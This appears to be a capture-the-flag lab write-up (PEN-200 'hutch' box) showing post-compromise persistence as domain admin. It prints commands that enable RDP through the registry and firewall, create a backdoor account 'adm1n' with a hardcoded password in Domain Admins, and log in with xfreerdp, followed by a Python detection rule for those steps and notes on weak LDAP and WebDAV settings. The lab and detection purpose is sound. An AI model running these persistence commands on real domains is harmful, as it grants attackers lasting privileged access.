Beyond


This is the Beyond page, where additional post-compromise enumeration and assessment are conducted as SYSTEM after compromising the target system.

*Evil-WinRM* PS C:\Users\domainadmin\Documents> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; netsh firewall add portopening TCP 3389 "Remote Desktop"
The operation completed successfully.
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.
 
*Evil-WinRM* PS C:\Users\domainadmin\Documents> net user /ADD adm1n Qwer1234 /DOMAIN ; net group /domain "Domain Admins" /ADD adm1n
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0    
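
A defender's view of the commands above, as an added example that is not part of the original page: a small correlation over Sysmon registry events (ID 13) and Windows Security events (4688, 4720, 4728) that flags the RDP enablement, the firewall opening, and a freshly created account landing in Domain Admins. The events are constructed, simplified dicts; the rule names, the 10-minute window and the SIDs are assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment
RDP_VALUE = r"\control\terminal server\fdenytsconnections"
DOMAIN_ADMINS_RID = "-512"      # well-known RID, independent of the group's display name

# Constructed sample events: simplified dicts, not real log exports.
# id 13 = Sysmon registry value set; 4688/4720/4728 = Windows Security log.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:05", "id": 13, "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"},
    {"time": "2024-01-01T10:00:06", "id": 4688,
     "CommandLine": 'netsh firewall add portopening TCP 3389 "Remote Desktop"'},
    {"time": "2024-01-01T10:01:10", "id": 4720, "TargetSid": "S-1-5-21-0-0-0-1601"},
    {"time": "2024-01-01T10:01:11", "id": 4728, "TargetSid": "S-1-5-21-0-0-0-512",
     "MemberSid": "S-1-5-21-0-0-0-1601"},
    {"time": "2024-01-01T11:30:00", "id": 4728, "TargetSid": "S-1-5-21-0-0-0-512",
     "MemberSid": "S-1-5-21-0-0-0-1104"},
]

def detect(events):
    """Return (rule_name, event_time) findings in chronological order."""
    findings, created = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 13:
            # RDP is switched on when fDenyTSConnections is written as 0.
            if (ev["TargetObject"].lower().endswith(RDP_VALUE)
                    and ev["Details"].endswith("(0x00000000)")):
                findings.append(("rdp_enabled_via_registry", ev["time"]))
        elif ev["id"] == 4688:
            # Covers both the deprecated "netsh firewall" and "netsh advfirewall" forms.
            cmd = ev.get("CommandLine", "").lower()
            if "netsh" in cmd and "3389" in cmd and ("portopening" in cmd or "add rule" in cmd):
                findings.append(("rdp_firewall_opened", ev["time"]))
        elif ev["id"] == 4720:
            created[ev["TargetSid"]] = ts  # remember when each account was created
        elif ev["id"] == 4728 and ev["TargetSid"].endswith(DOMAIN_ADMINS_RID):
            born = created.get(ev["MemberSid"])
            fresh = born is not None and ts - born <= WINDOW
            rule = "new_account_added_to_domain_admins" if fresh else "domain_admins_member_added"
            findings.append((rule, ev["time"]))
    return findings

if __name__ == "__main__":
    for rule, when in detect(SAMPLE_EVENTS):
        print(when, rule)
```
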

RDP

LDAP


In the domain controller’s Group Policy, "Domain controller: LDAP server signing requirements" is set to None.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrity is set to 1

1 means it does not require channel binding. This is what allows unauthenticated access to the LDAP server.

WebDAV


WebDAV is enabled and configured to grant all users both read and write access.